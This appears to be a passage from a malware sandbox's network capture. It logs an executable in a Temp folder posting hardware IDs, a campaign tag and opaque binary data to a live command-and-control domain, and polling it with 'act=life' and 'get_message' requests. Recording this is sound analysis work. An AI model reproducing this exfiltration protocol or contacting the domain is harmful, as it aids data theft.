2024-12-09 23:43:50 UTC	15331	OUT	Data Raw: 2d 2d 43 4a 52 42 34 4d 45 32 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 45 43 39 33 42 33 31 36 39 39 41 42 34 31 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 43 4a 52 42 34 4d 45 32 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 43 4a 52 42 34 4d 45 32 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 43 4a 52 42 34 4d 45 32 4e 0d 0a 43 6f 6e 74 65 6e Data Ascii: --CJRB4ME2NContent-Disposition: form-data; name="hwid"8BEC93B31699AB4123D904AF30EFEBBC--CJRB4ME2NContent-Disposition: form-data; name="pid"1--CJRB4ME2NContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--CJRB4ME2NConten
2024-12-09 23:43:50 UTC	15331	OUT	Data Raw: 4f c3 0f 15 f5 bc ec f2 fd d5 57 ec 3e d3 11 5f 81 01 29 e6 04 c0 b7 c1 b3 98 87 df d8 79 94 6f 36 e2 f0 37 58 9c 71 f9 ff 8c 00 f2 90 0a 3c f2 db 10 dc 0f e2 0c a9 b9 7e 80 99 cb 07 4e c3 01 91 21 38 ee 51 d9 5a 07 bf 99 fd 98 0d c5 90 95 62 5e 94 2f 7d 76 2d e5 77 de 54 cb 08 04 ed e5 db 73 d6 fa 40 6b db 25 ef e7 71 5e cf ab 45 3c 3d 70 84 36 f1 e6 68 8d 06 2e c7 bd 26 59 2d ff f2 0f fc 40 98 24 ba f5 3e 85 b9 c8 9e f9 f2 d7 b6 76 2c a5 3c 4e c1 3c ef 1b ee 8c 66 7a a3 8f 32 e8 7c 42 0f 7c af 5c ab 24 12 c6 36 73 de 5d 1a b4 6a da c9 ef 41 53 4e 86 98 a4 2c 5f 6d 5f fc 5b 0c 47 24 a8 de 44 2c 4c 48 dc d6 8c 1e 35 95 cb ea 0f 43 e4 4d 2e 5f 07 db 9c ef 96 f6 5f e5 ab fb f8 73 40 d2 d2 08 73 e2 b4 f3 ae 27 a9 a8 ff 50 6c 5d 85 d2 b5 16 6a 06 95 e2 86 7e Data Ascii: OW>_)yo67Xq<~N!8QZb^/}v-wTs@k%q^E<=p6h.&Y-@$>v,<N<fz2\|B\|\$6s]jASN,_m_[G$D,LH5CM.__s@s'Pl]j~
2024-12-09 23:43:50 UTC	15331	OUT	Data Raw: 3c 2e a3 e9 b2 69 fc 51 1b 1b 78 b9 b0 3b 38 09 1f ec 25 5a ee f0 95 5e ff d5 ff fa 5b 9b 2a f7 88 9a 9a 42 49 30 54 1c 62 0a 31 66 73 f1 60 db 8e 7f b5 58 6a 5d 04 62 90 fe 3b 72 7d fe 25 48 9a f9 ef 10 eb dc 6c 0d 6f 40 23 21 01 c4 29 f2 ff 35 68 5a aa bf 4f d4 04 22 e0 30 86 77 72 cf ee 3e 20 bd 9f a6 8a c0 f1 f5 eb fb 64 1b 65 92 a1 ea d5 9d 75 fd 72 95 52 60 b1 f1 06 e4 2b fa 2c fd b8 9a 68 fb 47 f4 95 ec fb bc 3d 7f 01 45 30 ae 9e f0 f3 f8 9f b6 82 c8 3a e4 40 8b b7 fe 20 48 c1 65 c6 f8 f4 28 44 0b 47 07 c0 c7 16 54 8a 38 f2 eb ba 1a 9e b8 ab 06 4c c2 6e c2 03 4e 10 11 7c 98 8a 78 4d 2a d0 f2 c8 dd db a0 b3 25 7f 8a 54 3c 5f bb 86 2f 35 49 ef 49 45 8c 94 90 b9 4c 58 09 d8 3b c0 22 26 ee 23 79 73 0a 98 11 48 20 7b f5 78 32 bf 7e 23 5d 02 9a d0 ae 25 Data Ascii: <.iQx;8%Z^[BI0Tb1fs`Xj]b;r}%Hlo@#!)5hZO"0wr> deurR`+,hG=E0:@ He(DGT8LnN\|xM%T<_/5IIELX;"&#ysH {x2~#]%
2024-12-09 23:43:50 UTC	15331	OUT	Data Raw: 3f 1f bc 97 65 7f ae 6c ff 58 59 f1 b2 26 13 89 43 84 5b e8 db c7 c9 37 72 d3 00 5d 8d 48 a5 a1 c9 fc 28 5e 25 e0 81 c5 ae 1f d3 b0 54 c1 3b e5 98 60 c1 53 28 1c 71 80 6b 78 70 10 e7 51 a2 f2 62 96 fd d0 e4 23 0f ec 3c f9 f6 cd eb 3f 74 dd 2c e7 87 d0 23 9d 17 e7 00 f1 0a 44 54 18 ca 47 01 d7 b6 82 27 4f e0 52 50 af ff df a9 b5 36 17 ac d5 db f7 eb 0d da 76 e1 fa f5 58 e4 9d d9 6a 5f 5e b3 e2 53 6e d5 5e 18 2f de 15 f9 85 e2 2c 51 3f 4b af 86 80 44 1c e4 36 b9 77 dd 8a 27 40 1e 38 7f 9f 23 45 d4 e0 86 e2 4a 51 bb f2 76 e9 61 bf 4b 08 bc 46 d3 3b 05 c8 ba 2c f5 15 21 8b 5a 52 aa 28 4e 04 bc 11 55 b7 04 99 0d 21 ae 80 30 54 30 37 2c 27 36 52 ad f5 8c a1 2f a4 fe 4f c4 8b 43 a4 16 80 59 44 b3 e3 f4 50 3b c1 c1 c5 9f ee e9 e8 f5 03 fb 77 6f c4 fd 4e a8 21 f3 Data Ascii: ?elXY&C[7r]H(^%T;`S(qkxpQb#<?t,#DTG'ORP6vXj_^Sn^/,Q?KD6w'@8#EJQvaKF;,!ZR(NU!0T07,'6R/OCYDP;woN!
2024-12-09 23:43:50 UTC	15331	OUT	Data Raw: 0d 4d 6e 52 66 32 62 1a 59 25 0f 5c e6 cb 2f 3d 90 e0 14 82 fa 47 30 11 df 3c 22 84 32 ae e0 00 0e 81 67 af 04 66 f5 b9 15 81 40 68 23 b4 90 e1 0f 83 fa a1 91 91 81 70 98 df ba 46 2f 3f c3 a2 a9 31 90 6e 4e fb 7d 82 6c 7a f4 78 78 46 84 76 05 57 c5 1b a1 b0 fa 56 c9 9a 6c 15 70 66 52 1e 22 ba f1 2d 0f 20 f1 88 40 e9 5b be 26 fe 1a 86 6d 91 9a 6b 95 3e 37 49 13 cd 07 24 85 27 9c 8c f5 b9 53 98 33 93 17 f7 af e7 0e a9 63 86 03 1f 0d 0e 07 1f 5b 50 ee 2e 62 b4 6a 8b d9 69 4b 35 2f 04 33 ae 1d 27 8b ad bf d6 b4 1d 96 6f 5d 94 b4 af 0f d3 10 6d 2b e7 84 71 53 04 05 46 82 30 20 18 03 63 6c 83 fe 5d 02 f4 91 05 23 31 60 1b 4d ab 3a 57 ec 14 83 09 47 a4 5b 84 e8 7b d9 35 53 3f 09 8d 4b 15 bc ce 79 1b 8f b6 3f 2f c0 5c 15 3e 68 17 aa ea b7 65 14 eb 98 8b f7 ff 56 Data Ascii: MnRf2bY%\/=G0<"2gf@h#pF/?1nN}lzxxFvWVlpfR"- @[&mk>7I$'S3c[P.bjiK5/3'o]m+qSF0 cl]#1`M:WG[{5S?Ky?/\>heV
2024-12-09 23:43:50 UTC	15331	OUT	Data Raw: e2 2e 83 ab a3 89 a8 56 d2 c5 d3 93 59 1a 78 68 2e 66 dc 3a b7 2e 82 e7 12 96 c2 d6 ba 40 37 87 90 f0 8c e4 c7 57 e2 7d 91 54 03 04 d6 48 c5 af 5b 86 cc af 2e eb 16 8c 21 25 10 a1 da cf 27 40 0c f7 74 41 26 e9 3c 8c 7c be 0b 07 bb 3c aa 07 cc 54 7c 64 79 bb c9 41 d2 39 c0 7e 3f 5b 9c b5 04 52 db 28 15 6b 81 b3 e0 34 98 72 57 14 03 9a 57 4c a9 3b 60 63 50 2b b3 72 e0 81 f2 dd cd 01 5d 0c 11 55 a1 26 e3 9e d7 8b 30 d9 94 31 d6 ad b2 b3 40 fe 0f 0a 98 93 36 ad 69 23 05 ed bb 8e f0 a0 cd 41 09 95 10 6d c2 d0 1c 07 0c e3 e1 16 24 b0 7c 04 77 89 82 dd 65 cb c2 f4 76 e3 5e 71 50 b6 79 7b 6f 00 0a 68 b0 9f 68 22 2a 0b b5 8a 08 d1 73 3a 25 19 50 df c1 f1 62 55 70 9a e1 fe 61 63 fd b0 e3 e0 46 d3 87 94 c3 e3 ec 47 95 29 2a ca d4 2c 83 3f 0a 7d 47 87 c2 7a 44 5b 0f Data Ascii: .VYxh.f:.@7W}TH[.!%'@tA&<\|<T\|dyA9~?[R(k4rWWL;`cP+r]U&01@6i#Am$\|wev^qPy{ohh"s:%PbUpacFG),?}GzD[
2024-12-09 23:43:50 UTC	15331	OUT	Data Raw: b6 24 b5 1e 10 e4 78 21 0a 7e 2e 8e 96 83 aa 35 7a 9b 25 15 b7 33 bd 69 b1 45 16 7e 34 e1 02 53 da b0 4d 11 dc 41 49 70 68 ee 21 20 dd 9c 9a b6 7b fa d6 e5 ba e3 8a 32 e5 8d ba 1a a0 9b 27 08 bf f3 18 3d 8d a6 bf dd 18 b5 cc ed ef 1d e3 ff 6e 0b 7d 51 27 5c e7 0c 91 19 59 01 fc f7 cc 0d fb 91 a4 45 7e be 8f 30 7d de 3a 7c 4f c1 10 f7 2f 1c ef b8 2e 60 c7 28 23 7e 42 7c aa 57 90 6d 0b d8 df 65 89 40 a3 23 77 0f 89 9f 71 98 2b cd ea 52 43 d5 50 5a a0 3e 79 70 e8 23 2e e9 a0 97 a1 76 8f 62 9f 63 d9 8e d0 33 b2 a4 be 09 5c 7a 9d 6e e7 57 ce 50 f9 c1 48 a4 e5 18 a6 ea 01 e9 39 eb a7 d5 95 06 d2 34 2e 7f bb c6 f0 08 92 49 a2 b0 c2 3d 10 da 4d 54 08 45 44 81 13 83 62 b7 ee 5a 8c 1f 15 39 24 7e 74 f5 d9 7c 43 a8 02 c9 ab 49 bb c4 84 c2 0b 0d 5d be 7b f6 b3 2f 63 Data Ascii: $x!~.5z%3iE~4SMAIph! {2'=n}Q'\YE~0}:\|O/.`(#~B\|Wme@#wq+RCPZ>yp#.vbc3\znWPH94.I=MTEDbZ9$~t\|CI]{/c
2024-12-09 23:43:50 UTC	15331	OUT	Data Raw: 5f d0 d3 57 51 54 b9 af fc 0c 69 83 ec 33 18 8e 91 d1 ed 3f 11 46 af 75 7d 64 b6 93 41 14 00 e5 a5 e3 e5 e5 06 5e 71 00 1f bc a0 5d 1f 2e ed e8 c7 99 ca b8 0c 08 fd 7e c1 e9 6e c6 9f 75 db eb da 8d 8a d7 33 54 b8 32 e7 48 fa 5b f6 96 8b 5a 57 69 dc e0 0f c1 a2 5b ad 5c be 73 6c ed 98 39 24 25 b3 52 65 d3 9e 9d 3e 69 eb 7d 15 e8 d3 d2 8f 66 b4 86 e6 d3 d4 b9 09 c1 bb d2 a7 6c e0 38 f8 6f 4a ff b7 9e c1 9b 86 80 50 00 f5 e0 25 8d 6d 38 c2 c1 ce df d6 c6 3f d0 b3 83 36 5e 17 04 6d 8d 9d e4 54 31 0f ee 20 1f cb ef 62 73 7a 8d 05 62 94 32 07 df cb 01 ad 23 b4 eb 9f d3 72 15 5b 6e 07 68 3f 0e ff 7c c7 f8 96 16 98 2e 89 6a 40 54 7a 9f 38 12 84 89 b2 16 00 b7 50 68 de a5 53 ce 84 49 d1 61 57 29 99 5d 75 f9 5e dd 52 7f 93 3c a5 c6 04 4d ca 30 90 70 bd 01 d8 31 ee Data Ascii: _WQTi3?Fu}dA^q].~nu3T2H[ZWi[\sl9$%Re>i}fl8oJP%m8?6^mT1 bszb2#r[nh?\|.j@Tz8PhSIaW)]u^R<M0p1
2024-12-09 23:43:50 UTC	15331	OUT	Data Raw: 7e de 52 81 a6 aa 8b 80 d8 67 7d 01 4f 45 94 ba 54 20 34 f6 bc 63 d5 cb e2 0e 1b c2 f5 2d c4 3d 07 b9 63 be a0 5e 9d d1 b7 10 b3 1e 06 d3 e0 d0 0b 8b e1 2a 7d f0 61 d9 96 09 2a 15 3b eb 4f 43 85 e1 20 49 d4 f9 d5 4a 9d 23 61 32 5b a3 81 65 03 dc 1a dd 91 44 42 47 1b e2 52 6f a1 1f df 45 21 90 d4 66 d2 78 7b dd d8 a9 29 30 55 66 4f 31 ca ec 9e 85 f0 86 c4 ea 5e e9 77 05 44 2f 51 61 2d ab be b0 a8 b0 49 dc 3b f3 36 cc 11 37 ad 2b 98 f3 50 ec e2 15 97 08 63 5e 95 7e 37 4b 2f d3 d1 5c 82 3f b7 1f 46 78 4c 27 c7 33 ba eb 37 6b f7 4e f0 1c bb 62 2a 8c 0a a5 ae cf 0c d1 77 c3 4a b3 bc 3a a5 d8 b2 f4 69 37 ed 0c 80 a3 c2 cc d6 bc e1 eb 7a 13 d9 01 f1 9b 56 ba ed d9 0c 29 ce 55 03 ea b5 36 42 57 0f db e3 28 56 57 e1 b2 aa 1e b8 a4 5d 98 36 98 ac 3a ce d4 1f 5f 3f Data Ascii: ~Rg}OET 4c-=c^}a;OC IJ#a2[eDBGRoE!fx{)0UfO1^wD/Qa-I;67+Pc^~7K/\?FxL'37kNb*wJ:i7zV)U6BW(VW]6:_?
2024-12-09 23:43:50 UTC	15331	OUT	Data Raw: f9 80 8e 68 c1 37 c6 cb 83 23 72 e0 9d 8c 1e 12 3c ed 13 4d 37 0f f9 b1 dd b2 3f d9 e4 ea d6 8f 67 c2 1a e0 e4 ba 9d 3a ff 67 80 e3 6a 25 2c 11 57 c8 0b 74 d6 6e 7b dd ba eb 7c 94 fa 03 89 f6 ab bd f5 2e 49 0e fc 96 3b a5 8b 7b 5e 27 0e e1 b8 2a 01 55 d2 37 3f aa 24 bc c5 10 6d 6b 50 d8 41 e5 dd e8 63 7b 8d 60 47 48 b6 0a 1c ae bf 9e 16 e6 a6 d2 b8 db 84 f7 f4 e8 bb 4e 7c 5e d4 50 cc fc 55 b3 b4 0e f1 5b 44 a1 cf 0e d4 ae e4 d0 81 3b 72 1b f6 d7 d6 3e 8a e0 b9 2f e8 a2 34 8c e1 21 41 25 c5 04 cb 6c c1 d7 47 b5 3e 45 bf d9 64 1f 29 f6 80 b2 9d bc d4 a5 bd a8 14 17 ec dc 78 b1 f0 5d e7 e6 48 5e 16 86 e3 66 26 3d 8d 81 70 73 ae cd d8 f1 b5 b7 35 d1 47 b0 fa ad dc 4e 27 03 c5 b5 da 38 52 15 1f 3e 31 58 43 af 4d 6c 8e 46 18 36 f9 9b 45 f0 ae ae c8 c7 44 f6 c8 Data Ascii: h7#r<M7?g:gj%,Wtn{\|.I;{^'*U7?$mkPAc{`GHN\|^PU[D;r>/4!A%lG>Ed)x]H^f&=ps5GN'8R>1XCMlF6ED
2024-12-09 23:43:54 UTC	1023	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:43:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fl0n4kpn5hi0eosbuma3labcvo; expires=Fri, 04-Apr-2025 17:30:30 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5h9xzMmUcsAsXugbX4d0L2v2opLb6%2FugHcbt463c6pllNm9ixq%2ByVXwFqQKTTNEKb7R90Jrx6qB7uBRP%2BvoGIjbpeXWCCUMHUsapg8zc0f3JDFgDQImVuvBGgBvnt1pfg18770U%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef8dc1298ab43df-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1590&rtt_var=653&sent=199&recv=588&lost=0&retrans=0&sent_bytes=2846&recv_bytes=569393&delivery_rate=1836477&cwnd=243&unsent_bytes=0&cid=66085fc26f6ac4d5&ts=4377&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49899	104.21.80.1	443	4600	C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:43:50 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=IR8T0H5J User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18109 Host: atten-supporse.biz
2024-12-09 23:43:50 UTC	15331	OUT	Data Raw: 2d 2d 49 52 38 54 30 48 35 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 45 43 39 33 42 33 31 36 39 39 41 42 34 31 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 49 52 38 54 30 48 35 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 49 52 38 54 30 48 35 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 49 52 38 54 30 48 35 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 Data Ascii: --IR8T0H5JContent-Disposition: form-data; name="hwid"8BEC93B31699AB4123D904AF30EFEBBC--IR8T0H5JContent-Disposition: form-data; name="pid"2--IR8T0H5JContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--IR8T0H5JContent-Di
2024-12-09 23:43:50 UTC	2778	OUT	Data Raw: 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b 56 Data Ascii: \f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5V
2024-12-09 23:43:51 UTC	1016	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:43:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=r0lj1al8otuqlcln58covi13i3; expires=Fri, 04-Apr-2025 17:30:30 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BLGHZewsje4oqSFe9zngtd8kmoQHsNqXxHQ2WAic0DSa4ZAKaMkey6j9oFi1PceuzYTazJ9mICZckpQeNfbgVeccYJ7JaZCDh%2FxUcH08l3qUmvIUNOgchsXFihKZg8rTyJCWE44%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef8dc156f1ec3f8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1456&min_rtt=1449&rtt_var=557&sent=11&recv=22&lost=0&retrans=0&sent_bytes=2845&recv_bytes=19063&delivery_rate=1938911&cwnd=160&unsent_bytes=0&cid=3d4fa3fb227b227d&ts=1374&x=0"
2024-12-09 23:43:51 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-09 23:43:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49908	104.21.80.1	443	4600	C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:43:53 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=QXI55MBO0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8736 Host: atten-supporse.biz
2024-12-09 23:43:53 UTC	8736	OUT	Data Raw: 2d 2d 51 58 49 35 35 4d 42 4f 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 45 43 39 33 42 33 31 36 39 39 41 42 34 31 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 51 58 49 35 35 4d 42 4f 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 58 49 35 35 4d 42 4f 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 51 58 49 35 35 4d 42 4f 30 0d 0a 43 6f 6e 74 65 6e Data Ascii: --QXI55MBO0Content-Disposition: form-data; name="hwid"8BEC93B31699AB4123D904AF30EFEBBC--QXI55MBO0Content-Disposition: form-data; name="pid"2--QXI55MBO0Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--QXI55MBO0Conten
2024-12-09 23:43:54 UTC	1023	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:43:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=k7bvk8kklrv25npvencg3o14vu; expires=Fri, 04-Apr-2025 17:30:32 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4m5Y4Oz4H8dLKBPdK%2F3lBKZ9V9DIMenTW1rCcGn%2B07ckLGdA3vYotWh6GsSPMDWpo8pxDADUI%2B%2Fc1b%2BxShvNzMsSuZjK7aufEfD9zpW1DIuSCqBUF%2BSHkiSmjBpkDR3D9hkZPcc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef8dc2778be0cc8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1691&min_rtt=1671&rtt_var=667&sent=9&recv=14&lost=0&retrans=0&sent_bytes=2845&recv_bytes=9668&delivery_rate=1593886&cwnd=225&unsent_bytes=0&cid=aecff6de7ee6f3a8&ts=923&x=0"
2024-12-09 23:43:54 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-09 23:43:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49918	104.21.80.1	443	8048	C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:43:55 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: atten-supporse.biz
2024-12-09 23:43:55 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-09 23:43:56 UTC	1013	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:43:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=je29tv6hgp9m8lnmuvit7ncmf7; expires=Fri, 04-Apr-2025 17:30:35 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m50uAGUc5dXuaqjHh%2F53tO414wKemddvWpQvzpXXtneUWMYL9NOYV00wXCWuaBy2kFGy6XtvL%2BeLpVJOKAxi3NYVPtkedBKOC8MI3jDeBwuePQSfONGte2q8NTsqfucxpFc4pPg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef8dc3578f50cc8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1660&min_rtt=1653&rtt_var=635&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1703617&cwnd=225&unsent_bytes=0&cid=2775aee70b70a6ed&ts=898&x=0"
2024-12-09 23:43:56 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-09 23:43:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49919	104.21.80.1	443	5796	C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:43:55 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 88 Host: atten-supporse.biz
2024-12-09 23:43:55 UTC	88	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 38 42 45 43 39 33 42 33 31 36 39 39 41 42 34 31 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=8BEC93B31699AB4123D904AF30EFEBBC
2024-12-09 23:43:56 UTC	1017	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:43:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=lhjct5u6o948133mfgivvgjc3g; expires=Fri, 04-Apr-2025 17:30:35 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Ssrl5CLW9LJ6sr7%2B7hs5HPqrzzVxYc9If74wf%2BKmAR%2Fm5ZpmIk5YW82SQS8h53VGRnEaMBWEt%2FjXalEyX0hDz6FLmS7ssuleIfUHQslVezaYSUEmtgBldrMQceFUsrIpbod4C4%3D"}],"group":"cf-nel","max_age":604800} NEL: 